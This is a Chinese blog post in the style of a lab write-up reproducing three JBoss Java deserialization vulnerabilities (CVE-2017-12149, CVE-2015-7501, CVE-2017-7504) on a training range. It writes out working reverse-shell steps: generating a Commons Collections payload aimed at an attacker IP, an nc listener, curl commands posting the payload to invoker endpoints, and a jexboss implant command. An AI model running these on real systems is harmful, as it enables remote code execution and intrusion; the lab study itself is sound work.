JBoss 漏洞研究 CVE-2017-12149 CVE-2015-7501 CVE-2017-7504

最新推荐文章于 2024-09-28 00:15:00 发布
最新推荐文章于 2024-09-28 00:15:00 发布
阅读量482 收藏 9
点赞数 12
分类专栏: CVE漏洞复现 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Bugatti100Peagle/article/details/141217013
版权

JBoss 漏洞研究

jboss 代码执行 (CVE-2017-12149)

影响范围

JBoss 5.x/6.x

漏洞原理

在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码
该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码

漏洞复现

图0

启动 https://vulfocus.cn/ 靶场环境

图1

访问 /invoker/readonly 如果返回500,说明此页面就可能存在反序列化漏洞。

图2

直接用CVE工具利用

图3

图4

靶场 flag-{bmh7cbffb27-ed9a-4c74-8929-0b6df905cc8a}

反弹shell的POC

下载工具后进入目录http://scan.javasec.cn/java/JavaDeserH2HC.zip

攻击机下载执行执行生成二进制payload文件:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

修改接收shell的IP和端口:

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:7777

图5

不要管报错

NC开启监听:

nc -vv -l -p 7777

向靶机发起攻击Payload:

curl http://123.58.224.8:26968/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

图6

反弹成功

图7

取得flag

JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)

影响版本

Red Hat JBoss A-MQ 6.x版本;
BPM Suite (BPMS) 6.x版本;
BRMS 6.x版本和5.x版本;
Data Grid (JDG) 6.x版本;
Data Virtualization (JDV) 6.x版本和5.x版本;
Enterprise Application Platform 6.x版本,5.x版本和4.3.x版本;
Fuse 6.x版本;
Fuse Service Works (FSW) 6.x版本;
Operations Network (JBoss ON) 3.x版本;
Portal 6.x版本;
SOA Platform (SOA-P) 5.x版本;
Web Server (JWS) 3.x版本;
Red Hat OpenShift/xPAAS 3.x版本;
Red Hat Subscription Asset Manager 1.3版本。

漏洞原理1

JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。

漏洞复现1

图8

如果嫩下载JMXInvokerServlet文件就存在漏洞。

git clone https://github.com/ianxtianxt/CVE-2015-7501/
cd CVE-2015-7501/
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:7777
nc -vv -l -p 7777
curl http://123.58.224.8:55153/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

图9

图10

_flag=flag-{bmh30a69994-5535-4de1-b53d-5c36c0d0498e}

JBoss EJBInvokerServlet 反序列化漏洞

跟CVE-2015-7501利⽤⽅法⼀样,只是路径不⼀样,这个漏洞利⽤路径是

/invoker/EJBInvokerServlet

JBossMQJMS 反序列化漏洞(CVE-2017-7504)

影响版本2

JBoss <=4.x

漏洞原理2

JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

漏洞复现2

访问 /jbossmq-httpil/HTTPServerILServlet 返回This is the JBossMQ HTTP-IL,说明存在反序列化漏洞。

图13

利用工具:JavaDeserH2HC

https://github.com/joaomatosf/JavaDeserH2HC

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机:7777
nc -vv -l -p 7777
curl http://123.58.224.8:47973/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

图14

flag-{bmh93d53260-14f8-4405-91cd-f4221ef65f3f}

Jexboss 工具一键植入
python jexboss.py -u http://123.58.224.8:47973/

图11

图12

参考链接

  1. https://mp.weixin.qq.com/s/IVVftRRofmGQaE52m4SAyQ
Bugatti100Peagle
关注
专栏目录
JBossMQJMS 反序列化漏洞CVE-2017-7504漏洞利用工具
07-23
渗透测试人员使用“CVE-2015-7501-master”这样的工具是为了模拟攻击,评估系统对这种类型漏洞的防御能力。该工具可能包含了构造恶意序列化数据的方法,以及利用漏洞获得shell的方法。在进行渗透测试时,这些工具...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
【标题】"CVE-2017-12149 JBOSS AS 6.X 反序列化漏洞详解及反弹shell技术" 【内容】 CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的反序列化过程。在Java中,反...
Jboss CVE-2017-7504 靶场工具
09-20
jexboss.py
网络安全详解
weidl001的博客
09-21 1480
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
网络安全证书考取相关知识
aa98865646的博客
09-21 745
作者是个想进入网络安全行业发展的小白,目前没啥钱,是想自学以后挖漏洞赚钱的,看了这两个算是比较常见的证书看起来都要花不少钱的话,我感觉自己还是先自学一段时间再说吧,实战更重要,这些证书等以后有机会慢慢考吧,如果需要的话。欢迎大佬补充其他适合小白考取的证书,目前感觉4800+480的NISP一级证书比较适合在学校的小白,CISP的话再NISP考到二级以后再加钱4000就可以换成CISP了,NISP适合学生,CISP适合职场啊,不过都是要钱啊。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-27 713
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全全方略
AI逍遥子
09-25 1285
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
信息安全工程师(24)网络安全体系建设原则与安全策略
最新发布
m0_73399576的博客
09-28 662
信息安全工程师——网络安全体系建设原则与安全策略篇
Linux 网络安全守护:构建安全防线的最佳实践
weixin_62641226的博客
09-23 974
通过定期更新系统、强化用户权限管理、配置防火墙、使用SSH安全连接、定期备份数据、监控系统日志以及安装安全工具,用户可以有效提升Linux系统的安全性,构建坚固的网络安全防线。Linux系统通常内置了防火墙工具,如`iptables`和`firewalld`。用户应根据实际需求,设置合适的规则,限制不必要的端口和服务。可以使用`rsync`、`tar`等工具进行备份,确保在发生安全事件时能够快速恢复。此外,定期审查用户账户和权限,及时删除不再使用的账户,确保只有必要的用户能够访问系统。
网络安全入门
丁爸的博客
09-23 1200
网络安全是一个复杂而重要的领域,它涉及保护网络系统的硬件、软件及其数据免受未经授权的访问、使用、泄露、中断、修改或破坏。网络安全是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,并保障网络数据的完整性、保密性、可用性的能力。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-23 1228
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
等保测评实战:构建企业网络安全的铜墙铁壁
w13359990065的博客
09-25 626
通过深度理解等保测评要求,构建多层次防御体系,强化安全监测与响应,以及培养全员参与的安全文化,企业能够有效提升网络安全防护能力,确保业务的连续性和数据的安全。通过等保测评实战,企业不仅能够构建稳固的网络安全防线,更能在竞争中展现出强大的信息安全竞争力,为企业的长远发展提供坚实的安全保障。企业应将这一过程视为信息安全体系建设的契机,通过持续的努力和改进,构建稳固的信息安全防线,为企业的长远发展提供坚实的安全保障。:深入理解等保测评中的风险评估方法,识别企业内部与外部的安全风险,制定应对策略。
什么是网络安全自动化以及优势与挑战
网络研究观
09-24 1059
网络安全自动化是指自动预防、检测、识别和消除网络威胁的过程。我们将详细了解网络安全自动化的各种挑战和优势。
网络安全】TCP和UDP
享你所想
09-23 879
流控(3)应该算是传输可靠性(2)中的一环,流量发的快一点或者慢一点,主要目的是保证对方能够正常收到这些信息,能够正常地处理这些信息,并且保证传输效率。我们发数据的时候,这个数据包有可能很大,因为里面的数据内容有可能很多,TCP可以分段就是可以把这些很大的数据包拆分开,拆成一个一个的小段,然后再去分别发送过去,而UDP不行,多大就多大发。我们在发送数据的时候,有的时候发送的太快,有的时候发送的太慢,我们要想办法控制一下这个速度,这点TCP可以做到,而UDP做不到。(网页浏览、电子邮件传输和文件传输等)
web开发中的网络安全
架构师吕师傅
09-22 838
超文本传输协议HTTP协议被用于在Web浏览器和网站服务器之间传递信息,HTTP协议以明文方式发送内容,不提供任何方式的数据加密,如果攻击者截取了Web浏览器和网站服务器之间的传输报文,就可以直接读懂其中的信息,因此,HTTP协议不适合传输一些敏感信息,比如:信用卡号、密码等支付信息。为了解决HTTP协议的这一缺陷,需要使用另一种协议:安全套接字层超文本传输协议HTTPS,为了数据传输的安全,HTTPS在HTTP的基础上加入了SSL协议,SSL依靠证书来验证服务器的身份,并为浏览器和服务器之间的通信加密。
网络安全:构建数字世界的坚固防线
shiming8879的博客
09-23 1154
网络安全,简而言之,是指通过采取一系列技术和管理措施,保护网络系统中的硬件、软件及其数据免受未经授权的访问、使用、泄露、中断、修改或破坏,从而确保网络服务的连续性、可用性和完整性。它涵盖了物理安全、系统安全、数据安全、应用安全、管理安全等多个层面,是一个综合性的安全体系。
网络安全知识:灾难恢复计划简介
qq_51301115的博客
09-24 550
灾难恢复 (DR) 计划包括一组明确的准则和详细说明,说明如何在灾难之前、期间和之后采取行动,以尽量减少灾难对组织的负面影响,并恢复关键任务运营。一般来说,基本的灾难恢复计划应包括以下组成部分:恢复目标、事件报告、行动响应和恢复程序。请注意,每个灾难恢复计划都是独一无二的,因为它考虑了自定义业务需求、恢复目标和特定组织的系统漏洞。除了灾难恢复计划之外,还需要有灾难恢复清单。灾难恢复清单包括在造成任何严重损害之前快速恢复业务运营应采取的步骤。
jboss CVE-2017-7504 如何修复
11-03
JBoss AS 4.x及之前版本中,JbossMQ实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。修复该漏洞的方法如下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值